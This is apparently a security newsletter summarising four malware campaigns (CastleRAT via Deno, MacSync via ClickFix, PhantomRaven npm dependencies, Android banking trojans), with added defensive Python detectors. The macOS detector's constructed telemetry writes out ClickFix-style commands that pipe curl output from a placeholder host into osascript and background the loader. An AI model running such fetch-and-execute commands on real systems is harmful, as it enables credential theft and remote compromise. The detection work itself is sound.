Trending Topics

TRENDING TOPICS MAR 12, 2026

CastleRAT Campaign Abuses Deno Runtime and Steganography to Deliver Fileless Malware

Researchers at ThreatDown identified a malware campaign that delivers CastleRAT, a remote access trojan designed for espionage, surveillance, and credential theft, by abusing the legitimate Deno JavaScript runtime. The attack begins with a social engineering technique known as ClickFix, which directs victims to a compromised webpage that displays a fake browser error or a CAPTCHA verification prompt. The page instructs users to copy and paste a command into the Windows Run dialog or terminal, which silently downloads a malicious installer and initiates the infection chain. Instead of immediately deploying malware, the script installs the legitimate Deno runtime, allowing attackers to execute obfuscated JavaScript within a trusted process and bypass many traditional security controls. Researchers note this is the first documented case of threat actors weaponizing the Deno runtime within a malware delivery framework. The next stage introduces a stealthy technique that leverages steganography and in-memory execution. The Deno process downloads a portable Python environment disguised as a legitimate component, along with a seemingly harmless JPEG image that actually contains the encrypted CastleRAT payload. A heavily obfuscated Python script extracts the hidden code from the image and loads it directly into memory via reflective PE loading, allowing the malware to run without writing an executable to disk. Once active, CastleRAT collects host information and communicates with command-and-control infrastructure while enabling keylogging, clipboard monitoring, browser credential theft, and cryptocurrency wallet harvesting. The malware can also activate webcams and microphones for surveillance, steal session tokens from applications such as Telegram and Discord, and provide attackers with a remote shell for full system control. 
Persistence is maintained through scheduled tasks that relaunch the loader after system reboot, ensuring continued access while remaining largely invisible to traditional antivirus tools. Organizations should implement behavior-based endpoint detection capable of identifying abnormal use of legitimate runtimes, such as Deno; monitoring suspicious command execution triggered by user prompts; and detecting in-memory injection activity and unusual process chains associated with reflective PE loading.
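The report above does not say how the payload is hidden inside the decoy JPEG, so the check below, an added example rather than ThreatDown's or the campaign's code, assumes the most common approach: ciphertext appended after the JPEG End-of-Image marker. It walks the JPEG segment structure to find where the real image ends, reports anything that follows, and applies two cheap heuristics (a single-byte XOR key that yields an MZ header, and byte entropy). The sample image and payload are constructed here.

```python
"""Inspect a JPEG for a payload appended after the image data.

Added example for the CastleRAT write-up; not code from ThreatDown or from
the campaign. Assumes the payload is appended after the EOI marker, which the
report does not confirm. CLEAN_JPEG and STEGO_JPEG are constructed samples.
"""
import math
import random
import struct
from collections import Counter

SOI, EOI = b"\xff\xd8", b"\xff\xd9"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for encrypted or compressed data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def find_jpeg_end(data: bytes):
    """Walk the JPEG segments and return the offset just past the real EOI.

    Walking segments instead of data.rfind(EOI) matters: an appended payload
    can contain a fake FF D9, which makes a last-occurrence search believe the
    image ends there and miss the trailer entirely.
    """
    if not data.startswith(SOI):
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None                               # corrupt segment structure
        marker = data[pos + 1]
        if marker == 0xD9:                            # EOI
            return pos + 2
        if marker == 0xFF:                            # fill byte
            pos += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # TEM / RSTn carry no length
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seglen
        if marker == 0xDA:                            # SOS: skip entropy-coded scan data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    return None


def inspect_jpeg(data: bytes) -> dict:
    """Return a verdict plus the evidence behind it."""
    end = find_jpeg_end(data)
    if end is None:
        return {"verdict": "malformed", "trailer_len": 0, "xor_key": None, "findings": ["no EOI found"]}
    trailer = data[end:]
    findings, xor_key = [], None
    if trailer:
        findings.append(f"{len(trailer)} bytes after EOI")
        if trailer[:2] == b"MZ":
            findings.append("trailer starts with MZ (PE header in the clear)")
        elif len(trailer) > 1:
            # Single-byte XOR is the cheapest "encryption": only one key maps
            # byte 0 to 'M', so just check whether it also maps byte 1 to 'Z'.
            k = trailer[0] ^ ord("M")
            if trailer[1] ^ k == ord("Z"):
                xor_key = k
                findings.append(f"trailer XOR 0x{k:02x} starts with MZ")
        ent = shannon_entropy(trailer)
        if ent > 7.0:
            findings.append(f"high-entropy trailer ({ent:.2f} bits/byte)")
    return {"verdict": "suspicious" if findings else "clean",
            "trailer_len": len(trailer), "xor_key": xor_key, "findings": findings}


# --- constructed samples (not from the campaign) ----------------------------
def _segment(marker: int, body: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(body) + 2) + body


CLEAN_JPEG = (
    SOI
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")
    + b"\x12\x34\xff\x00\x56\xff\xd0\x78"   # scan data with a stuffed FF00 and an RST0
    + EOI
)
_FAKE_PE = b"MZ" + random.Random(7).randbytes(2046)      # stand-in for a PE image
_CIPHERTEXT = bytes(b ^ 0xA7 for b in _FAKE_PE)            # single-byte XOR "encryption"
# A fake EOI planted inside the payload to defeat rfind()-based checks.
STEGO_JPEG = CLEAN_JPEG + _CIPHERTEXT[:100] + EOI + _CIPHERTEXT[100:]

if __name__ == "__main__":
    for name, img in (("clean", CLEAN_JPEG), ("stego", STEGO_JPEG)):
        print(name, inspect_jpeg(img))
```

Trailing data after EOI is not proof of malice on its own (some cameras and editors append metadata), so treat the verdict as a triage signal to pair with the process context the report describes: a Deno process writing a JPEG that a Python interpreter then reads.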

ClickFix Campaigns Target macOS Users With Evolving MacSync Infostealer

Researchers from Sophos X-Ops identified multiple campaigns leveraging the ClickFix social-engineering technique to deliver the MacSync infostealer to macOS users. Early campaigns observed in November 2025 used Google malvertising tied to search terms such as “ChatGPT Atlas,” redirecting victims to fake OpenAI-branded sites hosted on Google infrastructure. These pages instructed users to paste obfuscated commands into Terminal, which downloaded Bash scripts that requested the victim’s macOS password and deployed the MacSync stealer. A later campaign in December 2025 evolved the lure strategy by linking sponsored search results to shared ChatGPT conversations containing instructions for optimizing macOS systems. These conversations redirected victims to GitHub-themed landing pages that simulated legitimate software installation processes. Embedded tracking infrastructure collected victim telemetry through a hidden stats[.]php endpoint that recorded IP addresses, geolocation data, and interaction metrics, sending real-time notifications to attacker-controlled Telegram bots. Campaign telemetry revealed thousands of user interactions within days, indicating significant reach, even if not all interactions resulted in successful infection. By early 2026, researchers observed a significantly more advanced version of MacSync that shifted from standalone Mach-O binaries to a multi-stage loader-as-a-service architecture designed for stealth and persistence. After users execute the malicious Terminal command, an obfuscated shell script is retrieved that runs silently in the background, authenticates to the command-and-control infrastructure using API keys and unique victim tokens, and dynamically retrieves AppleScript payloads to be executed in memory via osascript. 
These payloads perform extensive data harvesting from the compromised system, including browser credentials, cookies, and autofill data from Chromium and Firefox browsers, macOS Keychain databases, SSH keys, cloud credentials such as AWS and Kubernetes configurations, and files from common user directories containing sensitive information. The malware also targets cryptocurrency wallets and attempts to tamper with Ledger Live installations by injecting malicious code that can exfiltrate seed phrases. Stolen data is packaged into compressed archives and exfiltrated in segmented uploads to attacker infrastructure, while the loader relaunches itself as a background daemon to maintain persistence and evade detection. Organizations should restrict execution of unsigned scripts and terminal commands from untrusted sources, monitor for suspicious osascript and curl activity originating from user shells, and deploy behavior-based endpoint detection capable of identifying macOS infostealers and anomalous command execution chains.
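The detection advice above (watch for osascript and curl launched from user shells) can be turned into a rule over process-exec telemetry. The script below is an added example, not Sophos code and not the campaign's own commands; it assumes exec events with pid, ppid, process name and command line, as an EDR or the macOS Endpoint Security framework would export, and the events are constructed with example.invalid as a placeholder host. It scopes itself to processes descending from a terminal application, which is where a pasted ClickFix command lives, and flags the shapes the write-up describes: fetched content piped straight into sh or osascript, the loader detaching into the background, and osascript with a curl sibling.

```python
"""Flag ClickFix-style command chains in macOS process telemetry.

Added example for the MacSync write-up; not Sophos code. EVENTS are
constructed, example.invalid is a placeholder, and the command lines are
readable approximations of what exec telemetry would record.
"""
import re
from collections import defaultdict

TERMINALS = {"Terminal", "iTerm2"}
SHELLS = {"sh", "bash", "zsh"}
FETCHERS = {"curl", "wget"}
# "| sh", "| bash", "| osascript": fetched or decoded content run without touching disk
PIPE_TO_INTERP = re.compile(r"\|\s*(?:/bin/|/usr/bin/)?(?:(?:ba|z)?sh|osascript)\b")
# nohup or a trailing &: the loader detaching so the Terminal looks idle again
BACKGROUND = re.compile(r"\bnohup\b|&\s*$")

EVENTS = [  # constructed telemetry: pid 100-106 is the malicious chain, 200s and 300s are benign
    {"pid": 100, "ppid": 1, "name": "Terminal", "cmd": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 101, "ppid": 100, "name": "zsh", "cmd": "-zsh"},
    {"pid": 103, "ppid": 101, "name": "curl", "cmd": "curl -fsSL https://example.invalid/i.sh"},
    {"pid": 102, "ppid": 101, "name": "bash",
     "cmd": "bash -c nohup sh -c 'curl -fsSL -H X-Api-Key:REDACTED https://example.invalid/s2 | osascript' >/dev/null 2>&1 &"},
    {"pid": 105, "ppid": 102, "name": "sh",
     "cmd": "sh -c curl -fsSL -H X-Api-Key:REDACTED https://example.invalid/s2 | osascript"},
    {"pid": 106, "ppid": 105, "name": "curl", "cmd": "curl -fsSL -H X-Api-Key:REDACTED https://example.invalid/s2"},
    {"pid": 104, "ppid": 105, "name": "osascript", "cmd": "osascript"},
    {"pid": 200, "ppid": 1, "name": "Script Editor", "cmd": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"},
    {"pid": 201, "ppid": 200, "name": "osascript", "cmd": "osascript /Users/dev/backup.scpt"},
    {"pid": 300, "ppid": 100, "name": "zsh", "cmd": "-zsh"},
    {"pid": 301, "ppid": 300, "name": "curl", "cmd": "curl -O https://example.invalid/tool.tgz"},
]


def build_tree(events):
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    return by_pid, children


def ancestors(by_pid, pid):
    """Process itself first, then parent, ..., up to the first pid we have no event for."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def analyze(events):
    by_pid, children = build_tree(events)
    alerts = []
    for proc in events:
        lineage = ancestors(by_pid, proc["pid"])[1:]            # parent ... root
        if not any(p["name"] in TERMINALS for p in lineage):
            continue  # this rule only covers commands typed or pasted into a terminal
        reasons = []
        if PIPE_TO_INTERP.search(proc["cmd"]):
            reasons.append("pipes fetched or decoded content into an interpreter")
        if BACKGROUND.search(proc["cmd"]):
            reasons.append("detaches into the background (nohup or trailing &)")
        if proc["name"] == "osascript":
            siblings = [by_pid[c] for c in children[proc["ppid"]] if c != proc["pid"]]
            if any(s["name"] in FETCHERS for s in siblings):
                reasons.append("curl/wget sibling under the same shell")
            if any(PIPE_TO_INTERP.search(p["cmd"]) for p in lineage):
                reasons.append("launched by a shell command that pipes into an interpreter")
        if reasons:
            alerts.append({"pid": proc["pid"], "name": proc["name"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyze(EVENTS):
        print(alert)
```

The benign osascript run from Script Editor and the plain curl download in a second shell produce no alert, which is the point of scoping on lineage and pipeline shape rather than on the binary names alone; a developer's curl is normal, curl feeding osascript from a shell the user just pasted into is not.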

PhantomRaven Expands Through New npm Waves Using Remote Dynamic Dependencies

Endor Labs has identified three new PhantomRaven waves spanning 88 malicious npm packages published between November 2025 and February 2026, showing that the campaign remains active well beyond its original 2025 disclosure. The attack relies on Remote Dynamic Dependencies (RDD), a technique in which the npm package itself appears largely benign, but its package.json points npm to fetch a second-stage dependency from an attacker-controlled external URL during installation. That design lets the malicious code evade many standard package scans because the harmful logic is never embedded in the registry-hosted package; the registry copy carries only the pointer. Across these new waves, the actor used over 50 disposable npm accounts, rotated domains and metadata, and increasingly relied on slopsquatted package names (plausible-sounding names of the kind an AI coding assistant might hallucinate) that mimicked Babel, GraphQL Codegen, ESLint, and import/export utility packages a developer might mistakenly trust. Once installed, the PhantomRaven payload executes automatically through a preinstall lifecycle script and steals a targeted set of developer and CI/CD data. The malware harvests email addresses from .gitconfig, .npmrc, environment variables, and local package.json metadata, then collects build pipeline secrets and environment context from platforms such as GitHub Actions, GitLab CI, Jenkins, and CircleCI. It also fingerprints the infected host by gathering the public IP, hostname, operating system, and Node.js version, then exfiltrates that data through a triple-redundant chain of HTTP GET, HTTP POST, and fallback WebSocket communications. Researchers found the payload remained almost unchanged across all four observed PhantomRaven waves, with 257 of 259 lines of code identical; only the C2 domain and exfiltration endpoint names changed. The infrastructure also showed clear continuity, with all domains using Amazon Registrar, AWS Route53, WHOIS privacy, AWS EC2 hosting, and no TLS certificates, reinforcing the attribution to a single operator who is iterating the same playbook. 
The key lesson is that PhantomRaven does not depend on advanced malware engineering so much as on npm's dependency resolution trusting whatever specifier a package.json contains, which lets a benign-looking package silently pull malicious code from outside the registry at install time. Organizations should block or strictly review npm packages that declare URL- or git-based dependencies outside the official registry, enforce package allowlisting and publisher verification, and monitor build environments for unexpected preinstall execution and outbound dependency fetches to non-registry domains. Installing with ignore-scripts enabled blocks the preinstall hook that triggers the payload, but it does not stop npm from fetching and unpacking the URL dependency itself, so the dependency review is still needed.
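The review the paragraph above calls for can be automated. The script below is an added example, not Endor Labs tooling: it classifies each dependency specifier in a package.json by where npm would resolve it (registry, HTTPS tarball, git URL, hosted-git shorthand, local path) and flags lifecycle scripts that run on install. It goes slightly beyond the URL case the write-up describes by covering the other non-registry specifier forms npm documents, since any of them fetches code the registry never scanned. The sample manifest is constructed; the package names in it are made up and example.invalid is a placeholder host.

```python
"""Audit package.json files for Remote Dynamic Dependencies and install hooks.

Added example for the PhantomRaven write-up; not Endor Labs code. The sample
manifest is constructed (made-up package names, example.invalid host).
"""
import json
import re
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
DEP_FIELDS = ("dependencies", "devDependencies", "optionalDependencies", "peerDependencies")

# Specifier forms npm resolves outside the registry, checked in order. Anything
# that matches none of these (a semver range, a dist-tag, an npm: alias) is a
# normal registry lookup. local-path sits before github-shorthand so that
# "../tools" is not mistaken for "owner/repo".
SPEC_CLASSES = [
    ("remote-url", re.compile(r"^https?://", re.I)),
    ("git-url", re.compile(r"^(?:git\+\w+://|git://|ssh://|git@)", re.I)),
    ("hosted-git", re.compile(r"^(?:github|gitlab|bitbucket|gist):", re.I)),
    ("local-path", re.compile(r"^(?:file:|\.{0,2}/)")),
    ("github-shorthand", re.compile(r"^[\w.-]+/[\w.-]+(?:#.*)?$")),
]


def classify_spec(spec: str) -> str:
    for label, pattern in SPEC_CLASSES:
        if pattern.search(spec):
            return label
    return "registry"


def audit_manifest(manifest: dict, path: str = "package.json") -> list:
    """Findings for one parsed package.json: install hooks and non-registry deps."""
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if cmd:
            # prepare only runs for the package's own checkout and git deps;
            # the other three run on every consumer's npm install.
            findings.append({"path": path, "kind": "lifecycle-hook",
                             "severity": "medium" if hook == "prepare" else "high",
                             "detail": f"{hook}: {cmd}"})
    for field in DEP_FIELDS:
        for name, spec in manifest.get(field, {}).items():
            kind = classify_spec(spec)
            if kind == "registry":
                continue
            findings.append({"path": path, "kind": kind,
                             "severity": "medium" if kind == "local-path" else "high",
                             "detail": f"{field}.{name} = {spec}"})
    return findings


def audit_tree(root) -> list:
    """Walk a checkout including node_modules: an RDD in a transitive package is the real risk."""
    out = []
    for p in Path(root).rglob("package.json"):
        try:
            manifest = json.loads(p.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        if isinstance(manifest, dict):
            out.extend(audit_manifest(manifest, str(p)))
    return out


# Constructed manifest: one registry dep, one npm: alias, one HTTPS tarball,
# one git URL, one local path, and a preinstall hook.
SAMPLE_MANIFEST = json.loads(r'''{
  "name": "codegen-import-helpers",
  "version": "1.0.0",
  "scripts": { "preinstall": "node ./scripts/setup.js" },
  "dependencies": {
    "graphql": "^16.9.0",
    "lodash-alias": "npm:lodash@^4.17.21",
    "eslint-config-shared": "https://example.invalid/pkg/eslint-config-shared-1.0.3.tgz",
    "babel-helper-imports": "git+https://example.invalid/org/helper-imports.git#main"
  },
  "devDependencies": { "local-tool": "file:../tools/local-tool" }
}''')

if __name__ == "__main__":
    for f in audit_manifest(SAMPLE_MANIFEST):
        print(f"{f['severity']:6} {f['kind']:17} {f['detail']}")
```

Run audit_tree against a checkout after npm install to catch the transitive case, and pair it with ignore-scripts=true in .npmrc and installs from a committed lockfile; the scanner tells you that a URL dependency exists, the lockfile tells you whether it changed since the last review.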

New Android Banking Trojans Expand from PIX Hijacking to Full Device Takeover

Researchers at Zimperium have identified six new Android malware families that blend banking fraud, credential theft, and remote device control. The set includes PixRevolution, BeatBanker, TaxiSpy RAT, Mirax, Oblivion RAT, and SURXRAT, with activity spanning Brazil, Russia, and broader criminal MaaS ecosystems. PixRevolution is especially notable because it targets Brazil’s PIX instant payment system using an agent-in-the-loop model, in which a human or possibly AI-assisted operator monitors the victim’s device in real time and intervenes at the exact moment a transfer is initiated. Instead of merely stealing credentials, the malware abuses Accessibility Services and MediaProjection to monitor the screen, present a fake “Aguarde…” overlay, replace the intended PIX key with an attacker-controlled one, and confirm the transaction before the victim notices. BeatBanker follows a similar financial-fraud path but adds unusual persistence through a looping low-volume audio file, integrates a Monero miner, and can swap cryptocurrency destination addresses during USDT transactions on Binance and Trust Wallet. TaxiSpy RAT combines traditional mobile banking-trojan behavior with broader RAT capabilities, including SMS theft, contact and call-log collection, screen monitoring, notification theft, and overlays against Russian banking, government, and crypto apps, while Mirax, Oblivion, and SURXRAT show that these capabilities are now increasingly packaged as commercial malware-as-a-service offerings. What ties these families together is their consistent abuse of Android accessibility permissions, remote-control features, and modular payload delivery to turn a compromised phone into a live fraud terminal rather than just a credential-stealing endpoint. 
PixRevolution spreads through fake Google Play pages impersonating trusted brands like Expedia, Correios, Sicredi, and even Brazilian government-themed apps, then uses polished onboarding screens to trick users into enabling an accessibility service labeled “Revolution,” after which it monitors transaction-related keywords and streams the victim’s screen to a C2 server over TCP. BeatBanker reportedly uses Firebase Cloud Messaging for C2 and has recently been observed dropping BTMOB RAT, while TaxiSpy uses Firebase push messaging, native-library encryption, rolling XOR obfuscation, and WebSocket-based real-time control to evade detection. SURXRAT extends this trend further by offering persistent accessibility-based control, Firebase-backed infrastructure, ransomware-style screen locking, and even limited LLM-related experimentation, suggesting that mobile RAT operators are actively testing AI-assisted features alongside conventional surveillance and fraud modules.

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.
